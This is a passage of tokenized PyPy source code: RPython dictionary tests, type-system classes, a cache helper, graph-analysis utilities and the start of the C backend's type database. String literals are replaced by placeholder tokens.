TO . OF , '<STR_LIT>' ) <EOL> assert hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> def test_opt_boolean_has_no_dummy ( self ) : <EOL> def f ( n ) : <EOL> d = { n : True } <EOL> d [ - <NUM_LIT> ] = True <EOL> del d [ n ] <EOL> return len ( d . copy ( ) ) , d [ - <NUM_LIT> ] , d <EOL> res = self . interpret ( f , [ <NUM_LIT:5> ] ) <EOL> assert res . item0 == <NUM_LIT:1> <EOL> assert res . item1 is True <EOL> DICT = lltype . typeOf ( res . item2 ) . TO <EOL> assert hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> assert hasattr ( DICT . entries . TO . OF , '<STR_LIT>' ) <EOL> def test_opt_multiple_identical_dicts ( self ) : <EOL> def f ( n ) : <EOL> s = "<STR_LIT:x>" * n <EOL> d1 = { s : <NUM_LIT:12> } <EOL> d2 = { s : <NUM_LIT> } <EOL> d3 = { s : <NUM_LIT> } <EOL> d1 [ "<STR_LIT:a>" ] = d2 [ s ] <EOL> d3 [ s ] += d1 [ "<STR_LIT:a>" ] <EOL> d2 [ "<STR_LIT>" ] = d3 [ s ] <EOL> return d2 [ "<STR_LIT>" ] , d1 , d2 , d3 <EOL> res = self . interpret ( f , [ <NUM_LIT:5> ] ) <EOL> assert res . item0 == <NUM_LIT> <EOL> assert lltype . typeOf ( res . item1 ) == lltype . typeOf ( res . item2 ) <EOL> assert lltype . typeOf ( res . item1 ) == lltype . typeOf ( res . item3 ) <EOL> def test_prebuilt_list_of_addresses ( self ) : <EOL> from pypy . rpython . lltypesystem import llmemory <EOL> TP = lltype . Struct ( '<STR_LIT:x>' , ( '<STR_LIT:y>' , lltype . Signed ) ) <EOL> a = lltype . malloc ( TP , flavor = '<STR_LIT>' , immortal = True ) <EOL> b = lltype . malloc ( TP , flavor = '<STR_LIT>' , immortal = True ) <EOL> c = lltype . malloc ( TP , flavor = '<STR_LIT>' , immortal = True ) <EOL> a_a = llmemory . cast_ptr_to_adr ( a ) <EOL> a0 = llmemory . cast_ptr_to_adr ( a ) <EOL> assert a_a is not a0 <EOL> assert a_a == a0 <EOL> a_b = llmemory . cast_ptr_to_adr ( b ) <EOL> a_c = llmemory . cast_ptr_to_adr ( c ) <EOL> d = { a_a : <NUM_LIT:3> , a_b : <NUM_LIT:4> , a_c : <NUM_LIT:5> } <EOL> d [ a0 ] = <NUM_LIT:8> <EOL> def func ( i ) : <EOL> if i == <NUM_LIT:0> : <EOL> ptr = a <EOL> else : <EOL> ptr = b <EOL> return d [ llmemory . cast_ptr_to_adr ( ptr ) ] <EOL> py . test . raises ( TypeError , self . interpret , func , [ <NUM_LIT:0> ] ) <EOL> def test_dict_of_voidp ( self ) : <EOL> def func ( ) : <EOL> d = { } <EOL> handle = lltype . nullptr ( rffi . VOIDP . TO ) <EOL> d [ - <NUM_LIT:1> ] = handle <EOL> return len ( d ) <EOL> assert self . interpret ( func , [ ] ) == <NUM_LIT:1> <EOL> from pypy . translator . c . test . test_genc import compile <EOL> f = compile ( func , [ ] ) <EOL> res = f ( ) <EOL> assert res == <NUM_LIT:1> <EOL> class TestOOtype ( BaseTestRdict , OORtypeMixin ) : <EOL> def test_recursive ( self ) : <EOL> def func ( i ) : <EOL> dic = { i : { } } <EOL> dic [ i ] = dic <EOL> return dic [ i ] <EOL> res = self . interpret ( func , [ <NUM_LIT:5> ] ) <EOL> assert res . ll_get ( <NUM_LIT:5> ) is res <EOL> class TestStress : <EOL> def test_stress ( self ) : <EOL> from pypy . annotation . dictdef import DictKey , DictValue <EOL> from pypy . annotation import model as annmodel <EOL> dictrepr = rdict . DictRepr ( None , rint . signed_repr , rint . signed_repr , <EOL> DictKey ( None , annmodel . SomeInteger ( ) ) , <EOL> DictValue ( None , annmodel . SomeInteger ( ) ) ) <EOL> dictrepr . setup ( ) <EOL> l_dict = rdict . ll_newdict ( dictrepr . DICT ) <EOL> referencetable = [ None ] * <NUM_LIT> <EOL> referencelength = <NUM_LIT:0> <EOL> value = <NUM_LIT:0> <EOL> def complete_check ( ) : <EOL> for n , refvalue in zip ( range ( len ( referencetable ) ) , referencetable ) : <EOL> try : <EOL> gotvalue = rdict . ll_dict_getitem ( l_dict , n ) <EOL> except KeyError : <EOL> assert refvalue is None <EOL> else : <EOL> assert gotvalue == refvalue <EOL> for x in not_really_random ( ) : <EOL> n = int ( x * <NUM_LIT> ) <EOL> op = repr ( x ) [ - <NUM_LIT:1> ] <EOL> if op <= '<STR_LIT:2>' and referencetable [ n ] is not None : <EOL> rdict . ll_dict_delitem ( l_dict , n ) <EOL> referencetable [ n ] = None <EOL> referencelength -= <NUM_LIT:1> <EOL> elif op <= '<STR_LIT>' : <EOL> rdict . ll_dict_setitem ( l_dict , n , value ) <EOL> if referencetable [ n ] is None : <EOL> referencelength += <NUM_LIT:1> <EOL> referencetable [ n ] = value <EOL> value += <NUM_LIT:1> <EOL> else : <EOL> try : <EOL> gotvalue = rdict . ll_dict_getitem ( l_dict , n ) <EOL> except KeyError : <EOL> assert referencetable [ n ] is None <EOL> else : <EOL> assert gotvalue == referencetable [ n ] <EOL> if <NUM_LIT> <= x <= <NUM_LIT> : <EOL> complete_check ( ) <EOL> print '<STR_LIT>' , referencelength <EOL> assert l_dict . num_items == referencelength <EOL> complete_check ( ) <EOL> def test_stress_2 ( self ) : <EOL> yield self . stress_combination , True , False <EOL> yield self . stress_combination , False , True <EOL> yield self . stress_combination , False , False <EOL> yield self . stress_combination , True , True <EOL> def stress_combination ( self , key_can_be_none , value_can_be_none ) : <EOL> from pypy . rpython . lltypesystem . rstr import string_repr <EOL> from pypy . annotation . dictdef import DictKey , DictValue <EOL> from pypy . annotation import model as annmodel <EOL> print <EOL> print "<STR_LIT>" % ( <EOL> key_can_be_none , value_can_be_none ) <EOL> class PseudoRTyper : <EOL> cache_dummy_values = { } <EOL> dictrepr = rdict . DictRepr ( PseudoRTyper ( ) , string_repr , string_repr , <EOL> DictKey ( None , annmodel . SomeString ( key_can_be_none ) ) , <EOL> DictValue ( None , annmodel . SomeString ( value_can_be_none ) ) ) <EOL> dictrepr . setup ( ) <EOL> print dictrepr . lowleveltype <EOL> for key , value in dictrepr . DICTENTRY . _adtmeths . items ( ) : <EOL> print '<STR_LIT>' % ( key , value ) <EOL> l_dict = rdict . ll_newdict ( dictrepr . DICT ) <EOL> referencetable = [ None ] * <NUM_LIT> <EOL> referencelength = <NUM_LIT:0> <EOL> values = not_really_random ( ) <EOL> keytable = [ string_repr . convert_const ( "<STR_LIT>" % n ) <EOL> for n in range ( len ( referencetable ) ) ] <EOL> def complete_check ( ) : <EOL> for n , refvalue in zip ( range ( len ( referencetable ) ) , referencetable ) : <EOL> try : <EOL> gotvalue = rdict . ll_dict_getitem ( l_dict , keytable [ n ] ) <EOL> except KeyError : <EOL> assert refvalue is None <EOL> else : <EOL> assert gotvalue == refvalue <EOL> for x in not_really_random ( ) : <EOL> n = int ( x * <NUM_LIT> ) <EOL> op = repr ( x ) [ - <NUM_LIT:1> ] <EOL> if op <= '<STR_LIT:2>' and referencetable [ n ] is not None : <EOL> rdict . ll_dict_delitem ( l_dict , keytable [ n ] ) <EOL> referencetable [ n ] = None <EOL> referencelength -= <NUM_LIT:1> <EOL> elif op <= '<STR_LIT>' : <EOL> ll_value = string_repr . convert_const ( str ( values . next ( ) ) ) <EOL> rdict . ll_dict_setitem ( l_dict , keytable [ n ] , ll_value ) <EOL> if referencetable [ n ] is None : <EOL> referencelength += <NUM_LIT:1> <EOL> referencetable [ n ] = ll_value <EOL> else : <EOL> try : <EOL> gotvalue = rdict . ll_dict_getitem ( l_dict , keytable [ n ] ) <EOL> except KeyError : <EOL> assert referencetable [ n ] is None <EOL> else : <EOL> assert gotvalue == referencetable [ n ] <EOL> if <NUM_LIT> <= x <= <NUM_LIT> : <EOL> complete_check ( ) <EOL> print '<STR_LIT>' , referencelength <EOL> assert l_dict . num_items == referencelength <EOL> complete_check ( ) </s>
<s> """<STR_LIT>""" <EOL> from pypy . tool . pairtype import extendabletype <EOL> from pypy . rpython . ootypesystem import ootype <EOL> from pypy . rpython . lltypesystem import lltype <EOL> from pypy . rpython . error import TyperError <EOL> class TypeSystem ( object ) : <EOL> __metaclass__ = extendabletype <EOL> offers_exceptiondata = True <EOL> def __getattr__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> def load ( modname ) : <EOL> try : <EOL> return __import__ ( "<STR_LIT>" % ( self . name , modname ) , <EOL> None , None , [ '<STR_LIT>' ] ) <EOL> except ImportError : <EOL> return None <EOL> if name in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> mod = load ( name ) <EOL> if mod is not None : <EOL> setattr ( self , name , mod ) <EOL> return mod <EOL> raise AttributeError ( name ) <EOL> def derefType ( self , T ) : <EOL> raise NotImplementedError ( ) <EOL> def deref ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def check_null ( self , repr , hop ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def null_callable ( self , T ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def getcallabletype ( self , ARGS , RESTYPE ) : <EOL> cls = self . callable_trait [ <NUM_LIT:0> ] <EOL> return cls ( ARGS , RESTYPE ) <EOL> def getcallable ( self , graph , getconcretetype = None ) : <EOL> """<STR_LIT>""" <EOL> if getconcretetype is None : <EOL> getconcretetype = self . getconcretetype <EOL> llinputs = [ getconcretetype ( v ) for v in graph . getargs ( ) ] <EOL> lloutput = getconcretetype ( graph . getreturnvar ( ) ) <EOL> typ , constr = self . callable_trait <EOL> FT = typ ( llinputs , lloutput ) <EOL> name = graph . name <EOL> if hasattr ( graph , '<STR_LIT>' ) and callable ( graph . func ) : <EOL> if hasattr ( graph . func , '<STR_LIT>' ) : <EOL> fnobjattrs = graph . func . _llfnobjattrs_ . copy ( ) <EOL> name = fnobjattrs . pop ( '<STR_LIT>' , name ) <EOL> else : <EOL> fnobjattrs = { } <EOL> _callable = fnobjattrs . pop ( '<STR_LIT>' , graph . func ) <EOL> return constr ( FT , name , graph = graph , _callable = _callable , <EOL> ** fnobjattrs ) <EOL> else : <EOL> return constr ( FT , name , graph = graph ) <EOL> def getexternalcallable ( self , ll_args , ll_result , name , ** kwds ) : <EOL> typ , constr = self . callable_trait <EOL> FT = typ ( ll_args , ll_result ) <EOL> return constr ( FT , name , ** kwds ) <EOL> def getconcretetype ( self , v ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def perform_normalizations ( self , rtyper ) : <EOL> """<STR_LIT>""" <EOL> from pypy . rpython . normalizecalls import perform_normalizations <EOL> perform_normalizations ( rtyper ) <EOL> class LowLevelTypeSystem ( TypeSystem ) : <EOL> name = "<STR_LIT>" <EOL> callable_trait = ( lltype . FuncType , lltype . functionptr ) <EOL> def derefType ( self , T ) : <EOL> assert isinstance ( T , lltype . Ptr ) <EOL> return T . TO <EOL> def deref ( self , obj ) : <EOL> assert isinstance ( lltype . typeOf ( obj ) , lltype . Ptr ) <EOL> return obj . _obj <EOL> def check_null ( self , repr , hop ) : <EOL> vlist = hop . inputargs ( repr ) <EOL> return hop . genop ( '<STR_LIT>' , vlist , resulttype = lltype . Bool ) <EOL> def getconcretetype ( self , v ) : <EOL> return getattr ( v , '<STR_LIT>' , lltype . Ptr ( lltype . PyObject ) ) <EOL> def null_callable ( self , T ) : <EOL> return lltype . nullptr ( T . TO ) <EOL> def generic_is ( self , robj1 , robj2 , hop ) : <EOL> roriginal1 = robj1 <EOL> roriginal2 = robj2 <EOL> if robj1 . lowleveltype is lltype . Void : <EOL> robj1 = robj2 <EOL> elif robj2 . lowleveltype is lltype . Void : <EOL> robj2 = robj1 <EOL> if ( not isinstance ( robj1 . lowleveltype , lltype . Ptr ) or <EOL> not isinstance ( robj2 . lowleveltype , lltype . Ptr ) ) : <EOL> raise TyperError ( '<STR_LIT>' % ( <EOL> roriginal1 , roriginal2 ) ) <EOL> if robj1 . lowleveltype != robj2 . lowleveltype : <EOL> raise TyperError ( '<STR_LIT>' % ( <EOL> roriginal1 , roriginal2 ) ) <EOL> v_list = hop . inputargs ( robj1 , robj2 ) <EOL> return hop . genop ( '<STR_LIT>' , v_list , resulttype = lltype . Bool ) <EOL> class ObjectOrientedTypeSystem ( TypeSystem ) : <EOL> name = "<STR_LIT>" <EOL> callable_trait = ( ootype . StaticMethod , ootype . static_meth ) <EOL> def derefType ( self , T ) : <EOL> assert isinstance ( T , ootype . OOType ) <EOL> return T <EOL> def deref ( self , obj ) : <EOL> assert isinstance ( ootype . typeOf ( obj ) , ootype . OOType ) <EOL> return obj <EOL> def check_null ( self , repr , hop ) : <EOL> vlist = hop . inputargs ( repr ) <EOL> return hop . genop ( '<STR_LIT>' , vlist , resulttype = ootype . Bool ) <EOL> def getconcretetype ( self , v ) : <EOL> return v . concretetype <EOL> def null_callable ( self , T ) : <EOL> return ootype . null ( T ) <EOL> def generic_is ( self , robj1 , robj2 , hop ) : <EOL> roriginal1 = robj1 <EOL> roriginal2 = robj2 <EOL> if robj1 . lowleveltype is lltype . Void : <EOL> robj1 = robj2 <EOL> elif robj2 . lowleveltype is lltype . Void : <EOL> robj2 = robj1 <EOL> if ( not isinstance ( robj1 . lowleveltype , ( ootype . Instance , ootype . BuiltinADTType ) ) or <EOL> not isinstance ( robj2 . lowleveltype , ( ootype . Instance , ootype . BuiltinADTType ) ) ) and ( robj1 . lowleveltype is not ootype . Class or <EOL> robj2 . lowleveltype is not ootype . Class ) : <EOL> raise TyperError ( '<STR_LIT>' % ( <EOL> roriginal1 , roriginal2 ) ) <EOL> v_list = hop . inputargs ( robj1 , robj2 ) <EOL> return hop . genop ( '<STR_LIT>' , v_list , resulttype = lltype . Bool ) <EOL> LowLevelTypeSystem . instance = LowLevelTypeSystem ( ) <EOL> ObjectOrientedTypeSystem . instance = ObjectOrientedTypeSystem ( ) <EOL> getfunctionptr = LowLevelTypeSystem . instance . getcallable <EOL> from pypy . tool . pairtype import pairtype <EOL> from pypy . annotation . model import SomeObject <EOL> class __extend__ ( pairtype ( TypeSystem , SomeObject ) ) : <EOL> def rtyper_makerepr ( ( ts , s_obj ) , rtyper ) : <EOL> return s_obj . rtyper_makerepr ( rtyper ) <EOL> def rtyper_makekey ( ( ts , s_obj ) , rtyper ) : <EOL> if hasattr ( s_obj , "<STR_LIT>" ) : <EOL> return s_obj . rtyper_makekey_ex ( rtyper ) <EOL> return s_obj . rtyper_makekey ( ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> from threading import RLock <EOL> lock = RLock ( ) <EOL> except ImportError : <EOL> lock = None <EOL> class Cache ( object ) : <EOL> def __init__ ( self ) : <EOL> self . content = { } <EOL> self . _building = { } <EOL> def getorbuild ( self , key ) : <EOL> if lock : lock . acquire ( ) <EOL> try : <EOL> try : <EOL> return self . content [ key ] <EOL> except KeyError : <EOL> if key in self . _building : <EOL> raise Exception , "<STR_LIT>" % ( <EOL> self , key ) <EOL> self . _building [ key ] = True <EOL> try : <EOL> result = self . _build ( key ) <EOL> self . content [ key ] = result <EOL> finally : <EOL> del self . _building [ key ] <EOL> self . _ready ( result ) <EOL> return result <EOL> finally : <EOL> if lock : lock . release ( ) <EOL> getorbuild . _annspecialcase_ = "<STR_LIT>" <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , len ( self . content ) ) <EOL> def _ready ( self , result ) : <EOL> pass <EOL> def _freeze_ ( self ) : <EOL> return True </s>
<s> import py <EOL> from pypy . tool . pytest . result import ResultFromMime <EOL> testpath = py . magic . autopath ( ) . dirpath ( '<STR_LIT:data>' ) <EOL> class TestResultCache : <EOL> def test_timeout ( self ) : <EOL> test = ResultFromMime ( testpath . join ( '<STR_LIT>' ) ) <EOL> assert test . ratio_of_passed ( ) == <NUM_LIT:0.> <EOL> def test_passed ( self ) : <EOL> test = ResultFromMime ( testpath . join ( '<STR_LIT>' ) ) <EOL> assert test . ratio_of_passed ( ) == <NUM_LIT:1.> <EOL> def test_unittest_partial ( self ) : <EOL> test = ResultFromMime ( testpath . join ( '<STR_LIT>' ) ) <EOL> assert test . ratio_of_passed ( ) == <NUM_LIT> / <NUM_LIT:15> <EOL> def test_doctest_of ( self ) : <EOL> test = ResultFromMime ( testpath . join ( '<STR_LIT>' ) ) <EOL> assert test . ratio_of_passed ( ) == <NUM_LIT> / <NUM_LIT> <EOL> def test_doctest_slash ( self ) : <EOL> test = ResultFromMime ( testpath . join ( '<STR_LIT>' ) ) <EOL> assert test . ratio_of_passed ( ) == <NUM_LIT> / <NUM_LIT> <EOL> def test_fail ( self ) : <EOL> test = ResultFromMime ( testpath . join ( '<STR_LIT>' ) ) <EOL> assert test . ratio_of_passed ( ) == <NUM_LIT:0.> </s>
<s> """<STR_LIT>""" <EOL> import autopath <EOL> import os <EOL> ROOT = autopath . pypydir <EOL> EXCLUDE = { } <EOL> def test_no_tabs ( ) : <EOL> def walk ( reldir ) : <EOL> if reldir in EXCLUDE : <EOL> return <EOL> if reldir : <EOL> path = os . path . join ( ROOT , * reldir . split ( '<STR_LIT:/>' ) ) <EOL> else : <EOL> path = ROOT <EOL> if os . path . isfile ( path ) : <EOL> if path . lower ( ) . endswith ( '<STR_LIT>' ) : <EOL> f = open ( path , '<STR_LIT:r>' ) <EOL> data = f . read ( ) <EOL> f . close ( ) <EOL> assert '<STR_LIT:\t>' not in data , "<STR_LIT>" % ( reldir , ) <EOL> elif os . path . isdir ( path ) and not os . path . islink ( path ) : <EOL> for entry in os . listdir ( path ) : <EOL> if not entry . startswith ( '<STR_LIT:.>' ) : <EOL> walk ( '<STR_LIT>' % ( reldir , entry ) ) <EOL> walk ( '<STR_LIT>' ) </s>
<s> import py <EOL> from pypy . rpython . lltypesystem import lltype <EOL> from pypy . translator . simplify import get_graph <EOL> from pypy . rpython . rmodel import inputconst <EOL> from pypy . tool . ansi_print import ansi_log <EOL> from pypy . annotation . model import setunion , s_ImpossibleValue <EOL> from pypy . translator . unsimplify import split_block , copyvar , insert_empty_block <EOL> from pypy . objspace . flow . model import Constant , Variable , SpaceOperation , c_last_exception <EOL> from pypy . rpython . lltypesystem import lltype <EOL> log = py . log . Producer ( "<STR_LIT>" ) <EOL> py . log . setconsumer ( "<STR_LIT>" , ansi_log ) <EOL> def graph_operations ( graph ) : <EOL> for block in graph . iterblocks ( ) : <EOL> for op in block . operations : <EOL> yield op <EOL> def all_operations ( graphs ) : <EOL> for graph in graphs : <EOL> for block in graph . iterblocks ( ) : <EOL> for op in block . operations : <EOL> yield op <EOL> def annotate ( translator , func , result , args ) : <EOL> args = [ arg . concretetype for arg in args ] <EOL> graph = translator . rtyper . annotate_helper ( func , args ) <EOL> fptr = lltype . functionptr ( lltype . FuncType ( args , result . concretetype ) , func . func_name , graph = graph ) <EOL> c = inputconst ( lltype . typeOf ( fptr ) , fptr ) <EOL> return c <EOL> def var_needsgc ( var ) : <EOL> if hasattr ( var , '<STR_LIT>' ) : <EOL> vartype = var . concretetype <EOL> return isinstance ( vartype , lltype . Ptr ) and vartype . _needsgc ( ) <EOL> else : <EOL> return True <EOL> def needs_conservative_livevar_calculation ( block ) : <EOL> from pypy . rpython . lltypesystem import rclass <EOL> vars = block . getvariables ( ) <EOL> assert len ( block . exits ) == <NUM_LIT:1> <EOL> exitingvars = block . exits [ <NUM_LIT:0> ] . args <EOL> for var in vars : <EOL> TYPE = getattr ( var , "<STR_LIT>" , lltype . Ptr ( lltype . PyObject ) ) <EOL> if isinstance ( TYPE , lltype . Ptr ) and not var_needsgc ( var ) : <EOL> if isinstance ( TYPE . TO , lltype . FuncType ) : <EOL> continue <EOL> try : <EOL> lltype . castable ( TYPE , rclass . CLASSTYPE ) <EOL> except lltype . InvalidCast : <EOL> if var in exitingvars : <EOL> return True <EOL> else : <EOL> return False <EOL> def generate_keepalive ( vars , annotator = None ) : <EOL> keepalive_ops = [ ] <EOL> for v in vars : <EOL> if isinstance ( v , Constant ) : <EOL> continue <EOL> if v . concretetype . _is_atomic ( ) : <EOL> continue <EOL> v_keepalive = Variable ( ) <EOL> v_keepalive . concretetype = lltype . Void <EOL> if annotator is not None : <EOL> annotator . setbinding ( v_keepalive , s_ImpossibleValue ) <EOL> keepalive_ops . append ( SpaceOperation ( '<STR_LIT>' , [ v ] , v_keepalive ) ) <EOL> return keepalive_ops <EOL> def split_block_with_keepalive ( block , index_operation , <EOL> keep_alive_op_args = True , <EOL> annotator = None ) : <EOL> splitlink = split_block ( annotator , block , index_operation ) <EOL> afterblock = splitlink . target <EOL> conservative_keepalives = needs_conservative_livevar_calculation ( block ) <EOL> if conservative_keepalives : <EOL> keep_alive_vars = [ var for var in block . getvariables ( ) <EOL> if var_needsgc ( var ) ] <EOL> for i , var in enumerate ( keep_alive_vars ) : <EOL> try : <EOL> index = splitlink . args . index ( var ) <EOL> newvar = afterblock . inputargs [ index ] <EOL> except ValueError : <EOL> splitlink . args . append ( var ) <EOL> newvar = copyvar ( annotator , var ) <EOL> afterblock . inputargs . append ( newvar ) <EOL> keep_alive_vars [ i ] = newvar <EOL> elif keep_alive_op_args and afterblock . operations : <EOL> keep_alive_vars = [ var for var in afterblock . operations [ <NUM_LIT:0> ] . args <EOL> if isinstance ( var , Variable ) and var_needsgc ( var ) ] <EOL> if len ( afterblock . operations ) > <NUM_LIT:1> or afterblock . exitswitch != c_last_exception : <EOL> afterblock . operations [ <NUM_LIT:1> : <NUM_LIT:1> ] = generate_keepalive ( keep_alive_vars , <EOL> annotator = annotator ) <EOL> keep_alive_vars = [ ] <EOL> else : <EOL> keep_alive_vars = [ ] <EOL> pos = len ( afterblock . operations ) <EOL> if afterblock . exitswitch == c_last_exception : <EOL> pos -= <NUM_LIT:1> <EOL> afterblock . operations [ pos : pos ] = generate_keepalive ( keep_alive_vars ) <EOL> return splitlink <EOL> def find_calls_from ( translator , graph , memo = None ) : <EOL> if memo and graph in memo : <EOL> return memo [ graph ] <EOL> res = [ i for i in _find_calls_from ( translator , graph ) ] <EOL> if memo is not None : <EOL> memo [ graph ] = res <EOL> return res <EOL> def _find_calls_from ( translator , graph ) : <EOL> for block in graph . iterblocks ( ) : <EOL> for op in block . operations : <EOL> if op . opname == "<STR_LIT>" : <EOL> called_graph = get_graph ( op . args [ <NUM_LIT:0> ] , translator ) <EOL> if called_graph is not None : <EOL> yield block , called_graph <EOL> if op . opname == "<STR_LIT>" : <EOL> graphs = op . args [ - <NUM_LIT:1> ] . value <EOL> if graphs is not None : <EOL> for called_graph in graphs : <EOL> yield block , called_graph <EOL> def find_backedges ( graph , block = None , seen = None , seeing = None ) : <EOL> """<STR_LIT>""" <EOL> backedges = [ ] <EOL> if block is None : <EOL> block = graph . startblock <EOL> if seen is None : <EOL> seen = { block : None } <EOL> if seeing is None : <EOL> seeing = { } <EOL> seeing [ block ] = True <EOL> for link in block . exits : <EOL> if link . target in seen : <EOL> if link . target in seeing : <EOL> backedges . append ( link ) <EOL> else : <EOL> seen [ link . target ] = None <EOL> backedges . extend ( find_backedges ( graph , link . target , seen , seeing ) ) <EOL> del seeing [ block ] <EOL> return backedges <EOL> def compute_reachability ( graph ) : <EOL> reachable = { } <EOL> blocks = list ( graph . iterblocks ( ) ) <EOL> for block in py . builtin . reversed ( blocks ) : <EOL> reach = { } <EOL> scheduled = [ block ] <EOL> while scheduled : <EOL> current = scheduled . pop ( ) <EOL> for link in current . exits : <EOL> if link . target in reachable : <EOL> reach [ link . target ] = True <EOL> reach = setunion ( reach , reachable [ link . target ] ) <EOL> continue <EOL> if link . target not in reach : <EOL> reach [ link . target ] = True <EOL> scheduled . append ( link . target ) <EOL> reachable [ block ] = reach <EOL> return reachable <EOL> def find_loop_blocks ( graph ) : <EOL> """<STR_LIT>""" <EOL> loop = { } <EOL> reachable = compute_reachability ( graph ) <EOL> for backedge in find_backedges ( graph ) : <EOL> start = backedge . target <EOL> end = backedge . prevblock <EOL> loop [ start ] = start <EOL> loop [ end ] = start <EOL> scheduled = [ start ] <EOL> seen = { } <EOL> while scheduled : <EOL> current = scheduled . pop ( ) <EOL> connects = end in reachable [ current ] <EOL> seen [ current ] = True <EOL> if connects : <EOL> loop [ current ] = start <EOL> for link in current . exits : <EOL> if link . target not in seen : <EOL> scheduled . append ( link . target ) <EOL> return loop <EOL> def md5digest ( translator ) : <EOL> from pypy . tool . compat import md5 <EOL> graph2digest = { } <EOL> for graph in translator . graphs : <EOL> m = md5 ( ) <EOL> for op in graph_operations ( graph ) : <EOL> m . update ( op . opname + str ( op . result ) ) <EOL> for a in op . args : <EOL> m . update ( str ( a ) ) <EOL> graph2digest [ graph . name ] = m . digest ( ) <EOL> return graph2digest </s>
<s> from pypy . rpython . lltypesystem . lltype import Primitive , Ptr , typeOf , RuntimeTypeInfo , Struct , Array , FuncType , PyObject , Void , ContainerType , OpaqueType , FixedSizeArray , _uninitialized <EOL> from pypy . rpython . lltypesystem import lltype <EOL> from pypy . rpython . lltypesystem . llmemory import WeakRef , _WeakRefType , GCREF <EOL> from pypy . rpython . lltypesystem . rffi import CConstant <EOL> from pypy . rpython . lltypesystem import llgroup <EOL> from pypy . tool . sourcetools import valid_identifier <EOL> from pypy . translator . c . primitive import PrimitiveName , PrimitiveType <EOL> from pypy . translator . c . node import StructDefNode , ArrayDefNode <EOL> from pypy . translator . c . node import FixedSizeArrayDefNode , BareBoneArrayDefNode <EOL> from pypy . translator . c . node import ContainerNodeFactory , ExtTypeOpaqueDefNode <EOL> from pypy . translator . c . support import cdecl , CNameManager <EOL> from pypy . translator . c . support import log , barebonearray <EOL> from pypy . translator . c . extfunc import do_the_getting <EOL> from pypy import conftest <EOL> from pypy . translator . c import gc <EOL> class NoCorrespondingNode ( Exception ) : <EOL> pass <EOL> class LowLevelDatabase ( object ) : <EOL> gctransformer = None <EOL> def __init__ ( self , translator = None , standalone = False , <EOL> gcpolicyclass = None , <EOL> stacklesstransformer = None , <EOL> thread_enabled = False , <EOL> sandbox = False ) : <EOL> self . translator = translator <EOL> self . standalone = standalone <EOL> self . sandbox = sandbox <EOL> self . stacklesstransformer = stacklesstransformer <EOL> if gcpolicyclass is None : <EOL> gcpolicyclass = gc . RefcountingGcPolicy <EOL> self . gcpolicy = gcpolicyclass ( self , thread_enabled ) <EOL> self . structdefnodes = { } <EOL> self . pendingsetupnodes = [ ] <EOL> self . containernodes = { } <EOL> self . containerlist = [ ] <EOL> self . delayedfunctionnames = { } <EOL> self . delayedfunctionptrs = [ ] <EOL> self . completedcontainers = <NUM_LIT:0> <EOL> self . containerstats = { } <EOL> self . externalfuncs = { } <EOL> self . helper2ptr = { } <EOL> self . late_initializations = [ ] <EOL> self . namespace = CNameManager ( ) <EOL> if translator is None or translator . rtyper is None : <EOL> self . exctransformer = None <EOL> else : <EOL> self . exctransformer = translator . getexceptiontransformer ( ) <EOL> if translator is not None : <EOL> self . gctransformer = self . gcpolicy . transformerclass ( translator ) <EOL> self . completed = False <EOL> self . instrument_ncounter = <NUM_LIT:0> <EOL> def gettypedefnode ( self , T , varlength = <NUM_LIT:1> ) : <EOL> if varlength <= <NUM_LIT:1> : <EOL> varlength = <NUM_LIT:1> <EOL> key = T <EOL> else : <EOL> key = T , varlength <EOL> try : <EOL> node = self . structdefnodes [ key ] <EOL> except KeyError : <EOL> if isinstance ( T , Struct ) : <EOL> if isinstance ( T , FixedSizeArray ) : <EOL> node = FixedSizeArrayDefNode ( self , T ) <EOL> else : <EOL> node = StructDefNode ( self , T , varlength ) <EOL> elif isinstance ( T , Array ) : <EOL> if barebonearray ( T ) : <EOL> node = BareBoneArrayDefNode ( self , T , varlength ) <EOL> else : <EOL> node = ArrayDefNode ( self , T , varlength ) <EOL> elif isinstance ( T , OpaqueType ) and T . hints . get ( "<STR_LIT>" , False ) : <EOL> node = ExtTypeOpaqueDefNode ( self , T ) <EOL> elif T == WeakRef : <EOL> REALT = self . gcpolicy . get_real_weakref_type ( ) <EOL> node = self . gettypedefnode ( REALT ) <EOL> else : <EOL> raise NoCorrespondingNode ( "<STR_LIT>" % ( T , ) ) <EOL> self . structdefnodes [ key ] = node <EOL> self . pendingsetupnodes . append ( node ) <EOL> return node <EOL> def gettype ( self , T , varlength = <NUM_LIT:1> , who_asks = None , argnames = [ ] ) : <EOL> if isinstance ( T , Primitive ) or T == GCREF : <EOL> return PrimitiveType [ T ] <EOL> elif isinstance ( T , Ptr ) : <EOL> try : <EOL> node = self . gettypedefnode ( T . TO ) <EOL> except NoCorrespondingNode : <EOL> pass <EOL> else : <EOL> if hasattr ( node , '<STR_LIT>' ) : <EOL> return node . getptrtype ( ) <EOL> typename = self . gettype ( T . TO ) <EOL> return typename . replace ( '<STR_LIT:@>' , '<STR_LIT>' ) <EOL> elif isinstance ( T , ( Struct , Array , _WeakRefType ) ) : <EOL> node = self . gettypedefnode ( T , varlength = varlength ) <EOL> if who_asks is not None : <EOL> who_asks . dependencies [ node ] = True <EOL> return node . gettype ( ) <EOL> elif T == PyObject : <EOL> return '<STR_LIT>' <EOL> elif isinstance ( T , FuncType ) : <EOL> resulttype = self . gettype ( T . RESULT ) <EOL> argtypes = [ ] <EOL> for i in range ( len ( T . ARGS ) ) : <EOL> if T . ARGS [ i ] is not Void : <EOL> argtype = self . gettype ( T . ARGS [ i ] ) <EOL> try : <EOL> argname = argnames [ i ] <EOL> except IndexError : <EOL> argname = 